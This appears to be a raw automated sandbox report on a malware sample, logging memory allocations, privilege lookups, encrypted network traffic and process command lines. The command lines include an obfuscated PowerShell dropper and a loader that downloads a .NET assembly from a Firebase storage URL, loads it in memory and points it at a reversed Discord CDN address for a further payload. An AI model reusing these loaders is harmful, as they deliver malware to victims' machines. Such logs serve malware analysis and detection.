stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c55000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c56000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c57000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c59000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c5e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c5f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 
'C:\Users\test22\AppData\Local\Temp\envifa.vbs');powershell -command $KByHL;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\envifa.vbs';[Byte[]] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($fpmxy).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb0040b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080ivne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' ));"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) 
);$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\envifa.vbs');powershell -command $KByHL;
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 
'C:\Users\test22\AppData\Local\Temp\envifa.vbs');powershell -command $KByHL;
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received W
Data received Sfµtµ «÷b, ©N‚éÔþ½;“Ÿ°DOWNGRD ˆ\k…bˆ„³¤ËÜ[njŽ7ê‰m†ø1€@öîÀ ÿ 
Data received j
Data received ’
Data received ŽAŽ¡×µÈìÁ¯#\5 ÆW¼oÕšo]XMj>³Šiœñ_πù­ÞØþÝuœîãƒ.úù~û@ó†é9ÿG0E u¼ÀÒ:>knŠ½o°'Å&@äbœ"/ç°Ð0á!节í‰*§"ó±/1Lì»·âSkK°ÊìjsÝjFÛ ¶‘
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ~Šëp—›“ŒFí‰ò²3ËRý‰Ë÷t¶ë—ǪÅÄÚSØê }VZ×øõô >
Data received €
Data received ¾u§î ¸rÚ ù:˛ÃH ³‘ÁcG^…<Ž  {sPœžœbÏ" @ÂH¡ÿûþxޅØ&µbÃD–½E›O>¦)<-Ð<aUá…$Znp‰ÅÿuéˆS5ä>ü¼„ä1)MuˆÅÃ`7ÚЉ ‡ÇÇûŸ‡|BȱžÜV¦‚¼ÐÿÀÎàÖöаPݨpòf ¦ƒ<)"FoWî„ÀŽæ¥º/œ»Ê(†O…‰A¨ùSºûö|Ü%3‰ëÚˊ_Ώè‹K‚Ë´Yâñ)„úÙë$áí SÈê]ÒP.ãb±±ÈÑ©ï,۔6SÀP'bm©s!ô—T>ž|bS*ú<ƒ*"§q]'gÞµÙºˆ—ÖH˜“•]¬b l”¨tàÀšG\GƜ@•üBD¹³‚]ðÑ8eNÝ!Åޝ\Ž Ê Ï†1|@˜ÍMáÉôÔ÷=Œ÷ò>ätV'¸ƒõ¨µsKgò–DRSY£ÿ÷×óäœð¼Þu—‹òEè Yö^×fEw€j5Hâ¸U£î7]Àþåg‚¸²f˽3OñÅ ÈÅk6!—ÿ´ …p%= êx°Ù  G6Üÿ48­²vfë©4_A”s¢»³2[Q%ßfù~-BÓÆ»ó×W라(0+ÌAti—¥·ÚÄ<6!Ðý旄 ?®D¦dá(œöÚù¦±¿I ¬DÇ\0 6˜r‰óÖïÍùÁì§2üŽ% Ë>E9v»ú¿eRšl…‘ž‚TƺrðÓ»c)|3œŠm6‹Îó…ÅÇèq¹ï3"ìïI1©ˆmKö>,‰äd{B¥†ûA•–
Data sent }fµt¦âlÈà_òCÈzŸÐýÌYˆHV$‚/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
Data sent FBA—&ý¿eéIIn¶$¥1)¥îžÆ9dÄ#ÒÂ*ÛZ¿4ìÛaÎ@ãÑúD`kûé½aʕólb¨Qeè?ºôX¨ 0JÊàH^Š×ÑKsój½ç.P¯§ƒD6ÛMª§"Ü}Hîrãe1ÊH6N <
Data sent Ðßå)AÑ«Ö½æA0pcNÿt;A†­“ ÆE=Ï ©s2[–_Nnñ4žpá x&? Q‰Óΰ¼€÷g±Gá9¦…ÓW5†.´q¿«6Ü°Bkù(¢V°¾.©Vø²ù~Í°®â~ü ÚhLB· DƒR$ÌQçRwø‡F…æ24¸~ Gÿ…¬tĀî”pqÿ:OñÎ'’ÌN”Ä&ÇÎýœC”÷ó»ôV¹Ñ/è"ì_T)ö¦×Þ}°ƒmãL‘Ö?•È¼4÷ό
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

send

buffer: }fµt¦âlÈà_òCÈzŸÐýÌYˆHV$‚/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
socket: 1424
sent: 134
1 134 0

send

buffer: FBA—&ý¿eéIIn¶$¥1)¥îžÆ9dÄ#ÒÂ*ÛZ¿4ìÛaÎ@ãÑúD`kûé½aʕólb¨Qeè?ºôX¨ 0JÊàH^Š×ÑKsój½ç.P¯§ƒD6ÛMª§"Ü}Hîrãe1ÊH6N <
socket: 1424
sent: 134
1 134 0

send

buffer: Ðßå)AÑ«Ö½æA0pcNÿt;A†­“ ÆE=Ï ©s2[–_Nnñ4žpá x&? Q‰Óΰ¼€÷g±Gá9¦…ÓW5†.´q¿«6Ü°Bkù(¢V°¾.©Vø²ù~Í°®â~ü ÚhLB· DƒR$ÌQçRwø‡F…æ24¸~ Gÿ…¬tĀî”pqÿ:OñÎ'’ÌN”Ä&ÇÎýœC”÷ó»ôV¹Ñ/è"ì_T)ö¦×Þ}°ƒmãL‘Ö?•È¼4÷ό
socket: 1424
sent: 213
1 213 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\envifa.vbs';[Byte[]] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($fpmxy).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb0040b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080ivne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' ));"
parent_process wscript.exe martian_process powershell -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp